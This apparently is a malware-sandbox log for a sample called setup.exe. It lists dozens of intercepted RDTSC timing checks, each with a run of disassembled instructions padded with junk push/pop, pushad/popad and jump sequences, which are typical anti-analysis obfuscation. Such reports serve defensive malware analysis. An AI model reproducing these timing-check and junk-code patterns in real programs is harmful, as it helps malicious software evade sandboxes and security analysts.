Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4F1015F second address: 4F1017F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, si 0x00000006 mov si, 4C99h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov ebp, esp 0x0000000f pushad 0x00000010 mov eax, 648EF5D1h 0x00000015 mov al, 1Eh 0x00000017 popad 0x00000018 pop ebp 0x00000019 pushad 0x0000001a mov ecx, edi 0x0000001c push eax 0x0000001d push edx 0x0000001e mov ah, bh 0x00000020 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4F40705 second address: 4F4070B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4F4070B second address: 4F4070F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4F4070F second address: 4F4075F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E4826Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], ebp 0x0000000e pushad 0x0000000f mov edi, esi 0x00000011 pushfd 0x00000012 jmp 00007F47D8E48270h 0x00000017 jmp 00007F47D8E48275h 0x0000001c popfd 0x0000001d popad 0x0000001e mov ebp, esp 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F47D8E4826Dh 0x00000027 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4EE0096 second address: 4EE009C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4EE009C second address: 4EE00A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4EE00A0 second address: 4EE00BC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E3B0ADh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov si, di 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4EE00BC second address: 4EE00C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4EE00C1 second address: 4EE00D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F47D8E3B0B1h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4EE00D6 second address: 4EE00F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F47D8E48273h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4EE00F4 second address: 4EE012C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop esi 0x00000005 pushfd 0x00000006 jmp 00007F47D8E3B0ABh 0x0000000b add cl, 0000006Eh 0x0000000e jmp 00007F47D8E3B0B9h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 xchg eax, ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4EE012C second address: 4EE0130 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4EE0130 second address: 4EE0136 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4EE0136 second address: 4EE0167 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E48272h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007F47D8E48270h 0x00000010 push dword ptr [ebp+04h] 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4EE0167 second address: 4EE016B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4EE016B second address: 4EE0171 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4EE0171 second address: 4EE0177 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4EE0177 second address: 4EE017B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4EE017B second address: 4EE019E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push dword ptr [ebp+0Ch] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F47D8E3B0B4h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4EE019E second address: 4EE01A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4F00DBA second address: 4F00DE2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E3B0B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007F47D8E3B0AAh 0x00000012 mov ax, 3C51h 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4F00DE2 second address: 4F00E84 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F47D8E4826Dh 0x00000009 sub si, 8F66h 0x0000000e jmp 00007F47D8E48271h 0x00000013 popfd 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 xchg eax, ebp 0x0000001a pushad 0x0000001b mov esi, 2C049B69h 0x00000020 mov esi, 4E428525h 0x00000025 popad 0x00000026 mov ebp, esp 0x00000028 pushad 0x00000029 pushfd 0x0000002a jmp 00007F47D8E4826Eh 0x0000002f adc esi, 6327B238h 0x00000035 jmp 00007F47D8E4826Bh 0x0000003a popfd 0x0000003b pushfd 0x0000003c jmp 00007F47D8E48278h 0x00000041 add eax, 6328AC98h 0x00000047 jmp 00007F47D8E4826Bh 0x0000004c popfd 0x0000004d popad 0x0000004e pop ebp 0x0000004f push eax 0x00000050 push edx 0x00000051 jmp 00007F47D8E48275h 0x00000056 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4F00E84 second address: 4F00E89 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4F008AD second address: 4F008BC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E4826Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4F008BC second address: 4F0094D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, 44h 0x00000005 mov ecx, 488C28C7h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e pushad 0x0000000f mov si, 69BFh 0x00000013 mov esi, 2BCAE2DBh 0x00000018 popad 0x00000019 push eax 0x0000001a pushad 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007F47D8E3B0ADh 0x00000022 or al, 00000066h 0x00000025 jmp 00007F47D8E3B0B1h 0x0000002a popfd 0x0000002b mov bl, ah 0x0000002d popad 0x0000002e pushfd 0x0000002f jmp 00007F47D8E3B0ADh 0x00000034 add eax, 30B38CC6h 0x0000003a jmp 00007F47D8E3B0B1h 0x0000003f popfd 0x00000040 popad 0x00000041 xchg eax, ebp 0x00000042 jmp 00007F47D8E3B0AEh 0x00000047 mov ebp, esp 0x00000049 jmp 00007F47D8E3B0B0h 0x0000004e pop ebp 0x0000004f push eax 0x00000050 push edx 0x00000051 push eax 0x00000052 push edx 0x00000053 push eax 0x00000054 push edx 0x00000055 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4F0094D second address: 4F00951 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4F00951 second address: 4F0096E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E3B0B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4F007F8 second address: 4F007FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4F007FC second address: 4F00800 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4F00800 second address: 4F00806 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4F00806 second address: 4F0081F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E3B0AAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov si, bx 0x00000011 mov ecx, ebx 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4F0081F second address: 4F00825 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4F00825 second address: 4F00829 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4F00829 second address: 4F00862 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push ebx 0x0000000d pop eax 0x0000000e pushfd 0x0000000f jmp 00007F47D8E48271h 0x00000014 xor ecx, 278D4C96h 0x0000001a jmp 00007F47D8E48271h 0x0000001f popfd 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4F00862 second address: 4F00868 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4F00868 second address: 4F0086C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4F004DB second address: 4F00577 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E3B0B7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c pushad 0x0000000d pushad 0x0000000e mov ebx, esi 0x00000010 pushfd 0x00000011 jmp 00007F47D8E3B0AEh 0x00000016 jmp 00007F47D8E3B0B5h 0x0000001b popfd 0x0000001c popad 0x0000001d popad 0x0000001e mov ebp, esp 0x00000020 pushad 0x00000021 pushfd 0x00000022 jmp 00007F47D8E3B0B3h 0x00000027 or esi, 17473A4Eh 0x0000002d jmp 00007F47D8E3B0B9h 0x00000032 popfd 0x00000033 pushad 0x00000034 mov esi, 3521462Dh 0x00000039 jmp 00007F47D8E3B0AAh 0x0000003e popad 0x0000003f popad 0x00000040 pop ebp 0x00000041 push eax 0x00000042 push edx 0x00000043 pushad 0x00000044 mov cx, bx 0x00000047 push ebx 0x00000048 pop esi 0x00000049 popad 0x0000004a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4F10353 second address: 4F1036D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E48276h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4F20386 second address: 4F203B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F47D8E3B0AFh 0x00000008 pop ecx 0x00000009 mov eax, edi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F47D8E3B0B1h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4F203B2 second address: 4F203B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4F203B8 second address: 4F203D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F47D8E3B0B1h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4F203D6 second address: 4F203EB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E48271h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4F203EB second address: 4F203FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F47D8E3B0ACh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4F203FB second address: 4F203FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4F0071C second address: 4F00746 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, 96D2h 0x00000007 mov ecx, edx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d jmp 00007F47D8E3B0B2h 0x00000012 mov dword ptr [esp], ebp 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 mov ax, dx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4F00746 second address: 4F0074B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4F0074B second address: 4F0075A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F47D8E3B0ABh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4F0075A second address: 4F00781 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E48279h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4F00781 second address: 4F00785 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4F00785 second address: 4F0078B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4F0078B second address: 4F00791 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4F00791 second address: 4F00795 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4F10F76 second address: 4F10F7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4F10F7C second address: 4F10F80 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4F10F80 second address: 4F10F8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4F10F8F second address: 4F10F93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4F10F93 second address: 4F10F97 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4F10F97 second address: 4F10F9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4F201C5 second address: 4F201C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4F201C9 second address: 4F201CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4F201CF second address: 4F201E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F47D8E3B0ADh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4F40011 second address: 4F40021 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F47D8E4826Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4F40021 second address: 4F40057 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 pushad 0x0000000a mov ch, 41h 0x0000000c jmp 00007F47D8E3B0AFh 0x00000011 popad 0x00000012 mov dword ptr [esp], ebp 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F47D8E3B0B5h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4F40057 second address: 4F40067 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F47D8E4826Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4F40067 second address: 4F4007D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F47D8E3B0AAh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4F4007D second address: 4F40083 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4F40083 second address: 4F40129 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 pushad 0x0000000a push esi 0x0000000b movsx edx, si 0x0000000e pop eax 0x0000000f call 00007F47D8E3B0ADh 0x00000014 jmp 00007F47D8E3B0B0h 0x00000019 pop eax 0x0000001a popad 0x0000001b mov dword ptr [esp], ecx 0x0000001e jmp 00007F47D8E3B0B1h 0x00000023 mov eax, dword ptr [774365FCh] 0x00000028 pushad 0x00000029 jmp 00007F47D8E3B0ACh 0x0000002e pushfd 0x0000002f jmp 00007F47D8E3B0B2h 0x00000034 and eax, 00816F08h 0x0000003a jmp 00007F47D8E3B0ABh 0x0000003f popfd 0x00000040 popad 0x00000041 test eax, eax 0x00000043 push eax 0x00000044 push edx 0x00000045 pushad 0x00000046 call 00007F47D8E3B0ABh 0x0000004b pop ecx 0x0000004c call 00007F47D8E3B0B9h 0x00000051 pop ecx 0x00000052 popad 0x00000053 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4F40129 second address: 4F4013A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F47D8E4826Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4F4013A second address: 4F4013E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4F4013E second address: 4F40159 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F484B2BBA86h 0x0000000e pushad 0x0000000f mov dx, cx 0x00000012 popad 0x00000013 mov ecx, eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4F40159 second address: 4F40176 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E3B0B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4F40285 second address: 4F4028B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4F4028B second address: 4F402AB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx ecx, dx 0x00000006 mov si, bx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov ebp, esp 0x0000000e jmp 00007F47D8E3B0ABh 0x00000013 pop ebp 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4F402AB second address: 4F402AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4F402AF second address: 4F402B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4F402B5 second address: 4F402BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4F402BB second address: 4F402BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4EF00A8 second address: 4EF00DA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F47D8E48277h 0x00000008 push ecx 0x00000009 pop edi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d and esp, FFFFFFF8h 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F47D8E4826Ch 0x00000019 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4EF00DA second address: 4EF00DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4EF00DE second address: 4EF00E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4EF00E4 second address: 4EF0168 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E3B0AEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a jmp 00007F47D8E3B0B0h 0x0000000f push eax 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F47D8E3B0B1h 0x00000017 adc si, 1266h 0x0000001c jmp 00007F47D8E3B0B1h 0x00000021 popfd 0x00000022 pushfd 0x00000023 jmp 00007F47D8E3B0B0h 0x00000028 or al, 00000008h 0x0000002b jmp 00007F47D8E3B0ABh 0x00000030 popfd 0x00000031 popad 0x00000032 xchg eax, ecx 0x00000033 push eax 0x00000034 push edx 0x00000035 push eax 0x00000036 push edx 0x00000037 jmp 00007F47D8E3B0B0h 0x0000003c rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4EF0168 second address: 4EF016C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4EF016C second address: 4EF0172 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4EF0172 second address: 4EF0178 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4EF0178 second address: 4EF017C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
